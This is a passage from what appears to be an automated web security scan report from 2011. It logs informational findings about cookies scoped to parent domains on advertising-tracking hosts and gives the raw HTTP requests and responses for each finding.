Set-Cookie: rtc_W55r=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000="pUPNJUOBr3IMlp94u+w/JTlxrDiJyuY/6HZOz2DKG/pV+zq2jLwjIRKIvhk+8HjFND8Y9dfVLKviOQmZQf5jgIoA2RaRQUEdHyR+sqqJlmlhpyIHYVkWUv7jk8buvVKlNI8edj/GdSN0NUsb0j3CwJE+DG9KWPMwZlOZjQBMWxba9i2uj5ldbft+dkzMH9ghs6hBB6f2l2fLjWwni3HZ8zz8ppJ9mqXAVs95liqcZUTYHa/nsEc4jvlLpNCZyotNtJCBnIk4ipF9g+MCnxFDP9ZLOeRkNoHiaHaJVw/wZLHfIxJXPJqb/Ux3pKiZPmonyrwLQJEi63pYbg8Gw+p+r6HYf/qMWm8ednkptBu8ocSjbV10sruN5QLbollYIN2ISd4tEHfvj8J7fssu/7o="; Version=1; Domain=.revsci.net; Max-Age=31536000; Expires=Sun, 16-Sep-2012 16:37:27 GMT; Path=/
Set-Cookie: rtc_D7sc=MLvv9LUuZh5n5/gHAhoIcUqQhbG0IiulStW4uLhwLED4nV/yEQqSZn7LcwWPHnKx4il3w3EIEI1CzUJC9uwyEiExOKM/KMECMfAA+n8R61OVdM5QoumI2f8AnsuJ0srfsOJmxcPYEF9sp4lx06ZUW3d9bO0nqAJl/T+HT1GYW/hbeFcx6y5OG1W6041ImKEBkVKkUqtbqUuR4cmsRrKeClnqXDBmBaMN9xy5JNqwk+xbpHdk1+9E8UOuoAnWOL8SVNAZ3G5qXl0gLLbshnwub3zIHTZGSjXo6xy1VWKZ2n7lEjQjahwQ3ClMV6nfFPaFI9s9bALBgJgP10Y92vXK3Tsh44mwAdMeeNfBMPp7eFvEK8nT9N+re1TGFc9MLIQi2dpj87smnapZ0nfImAjjmi1VZNmx0WMryj4uCjyZTuAMt6C8FZhKRSOHxMhP43+ZzIiARCMHglmDqqSH4omQvrGabqkNFRlyi9r5m2HvbbHJ5tqWwjY+P3lahwQbKTWINpRCa6wHAt3pCQGljFRXQ/+gGRoN/6zbOMFZBKYvKtHkXQ2kg9hbxKK4qwoZ/ud0Uc0+X1rgtHMcvCOlU16h+bDIeFzn9fTodf0e2POdQP8nTA3iFFRpVatd2FLm4mHPwXsfsy+fM/coldzMofcuLWTVfar59ag3zuCfuZ5ZlqE2qlC05K1Kh+S448y5RuWQvagomeCQQ8ORK6OS/5g102KgEolZrrhas12QVpWZr1XWiXxs8Yh6pFOvqrBi9lsiVZWzVKOmgdVUhx5F0u2ZHJ+J16yr3xzhiR0Y3LsB+dn1ue7ASDwq0BG8UXD3Q5toR1+LC5bN+TKaL8xmqSLwQW6AVyz6KOU8HooJ45Fx/rrG1QpIIjqzlUGRLGEKA+2LoM38O5UMAl/G1sk2BeqqTdxqi4OU1g==; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:37:27 GMT; Path=/
Set-Cookie: NETSEGS_F09828=e98f30f2b8e2390e&F09828&0&4e99b6c7&0&&4e7403bf&239be0b9fdae6d2fbd805afcd850cfc7; Domain=.revsci.net; Expires=Sat, 15-Oct-2011 16:37:27 GMT; Path=/
X-Proc-ms: 17
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:26 GMT
Content-Length: 902

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs = ['F09828_10664','F09828_10665','F09828_10680','F09828_10702','F09828_10762','F09828_10763','F09828_11018','F09828_11037','F09828_1108
...[SNIP]...
12.116. http://pix04.revsci.net/I09837/b3/0/3/0902121/486412827.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I09837/b3/0/3/0902121/486412827.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I09837/b3/0/3/0902121/486412827.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.realage.com%252F%253Fpage%253D%2526cbr%253Dnull%2526hi%253D%2526a%253D%2526g%253Dundefined%2526b%253D%2526l%253D%2526optin%253D1%2526new%25252Frepeat%253DNew%2526assessment%253Dundefined%2526search%252520term%253D%2526days%252520since%252520last%252520visit%253DFirst%252520page%252520view%252520or%252520cookies%252520not%252520supported%2526search%252520term%253D%2526video%252520name%253Dundefined%2526page%252520url%253Dhttp%25253A%25252F%25252Fwww.realage.com%25252F%2526ad%252520categories%253D%2526ad%252520impression%253Dundefined%2526ad%252520clickthrough%253Dundefined%2526monthly%252520new%252520or%252520return%253DNew%2526traffic%252520source%253D%2526us%25252Fnon%252520us%253D%2526member%25252Fnon%252520member%253Dnon-member%26DM_CAT%3DRealAge%26DM_REF%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fmetrix4media.php%26DM_EOM%3D1&C=I09837 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.realage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJk+B73IM1p94u+w/laQbf6+lz8ELNM5Vc4Rolc9aqYeSA7Ot9uNg2v9oDss6IqtPYudgLL+SIwarfPSfqUd5S4nO0iB2YlcZM/NMKin8fzqXUamHmGKHVc2IEzLyrhYncD3GdTNVMyvdJNWE5nOWDuvFhOUx9n71gsbgsmhMaehsXdR6+g/Kfcw2pxWTukDEga+j9sjwJH8to7xh8MHe1GQjVL0IEbfOQ7K7V9esWjRyMtXUptHBm7ELw3uiP2Ib9HldaGmxnOtfaaeP3E5QjYhzUvL5voTDickiwMFjO+oDZcksc40u8xpmKZES28Zoueo8jJJz7Q4xhFz/I7/Q; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:36:32 GMT; Path=/
Set-Cookie: NETSEGS_I09837=e98f30f2b8e2390e&I09837&0&4e99b690&0&&4e73fbc8&239be0b9fdae6d2fbd805afcd850cfc7; Domain=.revsci.net; Expires=Sat, 15-Oct-2011 16:36:32 GMT; Path=/
X-Proc-ms: 8
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:36:31 GMT
Content-Length: 673

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]
...[SNIP]...
12.117. http://pix04.revsci.net/I09839/b3/0/3/1008211/194305936.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I09839/b3/0/3/1008211/194305936.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I09839/b3/0/3/1008211/194305936.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252F%253FBeauty%252520Book%252520Status%253DFalse%2526_rsiL%253D0%26DM_CAT%3DQuick%2520%2526%2520Simple%26DM_REF%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fmetrix4media.php%26DM_EOM%3D1&C=I09839 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Set-Cookie: rtc_z0DM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IGDA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pfus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BRdV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jYH_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fzlq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-mxv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mHcA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HXmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pKCG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Klrm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU6Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_s926=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9i7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rXeX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XwpC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2N5M=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_X46z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gR4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tnvC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HxEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1zQw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pe6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oybS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__3n9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ix0F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D5V5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gHAY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6BxH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KKED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_nSm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_458L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FYNR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b81E=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D3Fl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AAAA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDaq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kbwA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xA_8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CJm7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_En3x=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fL1F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bXp4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w6Dv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dhzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GwOc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-37=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ux5A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wENX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mFWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CY0g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oP87=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_izKJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1vJj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mBmG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xguM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5ff3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5UrE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ptS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6ZIi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiTd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zcl2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G-1g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DiFj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xNIB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000="pUPFJkmBrwIMl594t637EICbRK4QHREL5G4UoYRo7896qYeIB48s9uNg2v9kDss6IrPb32QuZAA+ogTcdvc12uWS8zNU8vksvYtAU6UZuHGGPjPpQ5MxVpjgP4vuejYFNo+S4+m7EU6TTwk/FEx2QagOfpJdbr04CGJT9Mizt+HrTvOtdCT3iuMefdv+k4tpy5gEw9+l5r6kQvcj+w6WIN94r10iwKRwRhsa0gjyxXSSUoJHkrUJB/DBJczm+OyAKiHoCB70hpWXvczT318bIecd5dKeVoJqNjzuqhw6skMLwgzQvVU/MVmBY/W0dAprmjy0RTJw4oPZ50gPFdDP+xQ="; Version=1; Domain=.revsci.net; Max-Age=31536000; Expires=Sun, 16-Sep-2012 16:37:01 GMT; Path=/
Set-Cookie: rtc_pDET=MLvv9aEOYT5j57i/ixrq7ESAVntFgjI29t2xBQPh8HXbytI0rbuQdocrtHLkYVKR4WqGSuPieDgcgFLc74AMPt+1vU1g7402fvmpdSBnI0/yhPLtCSGcwVKsuQ3T2X146Y2s4Y5VX/x4D/7u9IhCoUrrvgflVwvlKjw4ErzlQDE2q/Ys6J+/Nvxdh2Hfplu+oQ7F3SKOiIuWw/4/4cLZlA4JMAgdGjtY5rmilMjYZElz3CBIzIOFGK1l0a3DkpdBtl80hKfrpadLhZ66B2OlJYJBgLh46PEwq+gsXJzzBsp9JzQNyrqVbvffpQgHwZVhWckg2IOG0p8dcrULMzkVAYVsbaHvdOGD1ewlQXWDhlwy6hiv8kvTHJ3eUx+QeJIwsZ5K8Mp8KM3tCMpALtayzRf+LxNkZV6SRZGUMwhgOHIg4mjAgUxsTUfAK+tr4eCSYsBTJZ5sLrCKXZicAuTnNYyczR1jWkoJwQZTk9xYHzm7uhmkN4mDpJdPKFlli+SOVwdBwQCNmc02963jqlITuJ5tFaqCmTlgCIfwGauBvyq7QNr30AIijXBdII8sERacop33KBpaV6T569sGdzHlP9KElZxl7/8JDDxH6mtitDXRMX7ogbEwY6SV49zQqFoMNecrEiakLknKFHCT6kgsnR5F7cAeMGFHkHoFCFFiYsWW2Ud640WKbAZLX1HsGqRGBgfXKQPJYQbeOoseUNLoSw==; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:37:01 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:00 GMT
Content-Length: 731

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs=['I09839_10001','D08734_72674'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.re
...[SNIP]...
12.118. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/optout?nocache=0.6576139 HTTP/1.1
Host: pixel.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1315321216; sit=1_1313187598_11:0:0; cre=1_1315321216_20053:11792:1:0:0_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; bpd=1_1313187598; apd=1_1313187598; scg=1_1315321216; ppd=1_1315321216; afl=1_1313187598; act=1_1315321216; eng=1_1313670599_20056:0

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:18:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: apd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cmp=1_1316279916_20:3092318; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1316279916_20053:11792:1:958700:958700_20056:11790:1:2609453:2609453_20054:11791:1:2855127:2855127; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uat=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1316279916_11:3092318:3092318; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1316279916_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: opt=; Domain=.fetchback.com; Expires=Thu, 15-Sep-2016 17:18:36 GMT; Path=/
Set-Cookie: ppd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1316279916_20056:2609317; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 17:18:36 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://pixel.fetchback.com/serve/fb/optoutverification
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 0

12.119. http://pixel.quantserve.com/optout_set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_set?s=nai&nocache=0.7603821 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:35 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=0.7603821
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:35 GMT
Server: QS

12.120. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=260246413;fpan=1;fpa=P0-1368744640-1316295502134;ns=0;url=http%3A%2F%2Fwww.local.com%2F;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=title.Local%252Ecom%20-%20Search%20for%20local%20businesses%252C%20events%252C%20and%20coupons%20near%20you%2Curl.http%3A%2F%2Fwww%252Elocal%252Ecom%2F%3Flocation%3DDallas%252c%2BTX%2Ctype.%2Cdescription.Find%20local%20listings%20of%20businesses%20and%20services%20near%20you%252E%20Get%20driving%20directions%252C;dst=1;et=1316295502133;tzo=300;a=p-7dRSNJjMQXwDI HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EHQBIgHdB4HyBprRW9iB4QochAHS

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/8171//99D2/
Set-Cookie: d=EKUBIQHdB4HyBprRW9iB4QochAEA; expires=Fri, 16-Dec-2011 16:37:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 16:37:09 GMT
Server: QS

12.121. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=439524AE8C6B634E021F5F7802166020&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; put_2132=439524AE8C6B634E021F5F7802166020; ruid=154e62c97432177b6a4bcd01^6^1315959802^840399722; csi15=3165738.js^1^1315959802^1315959802; csi2=3167262.js^1^1315960045^1315960045; put_1185=2944787775510337379; 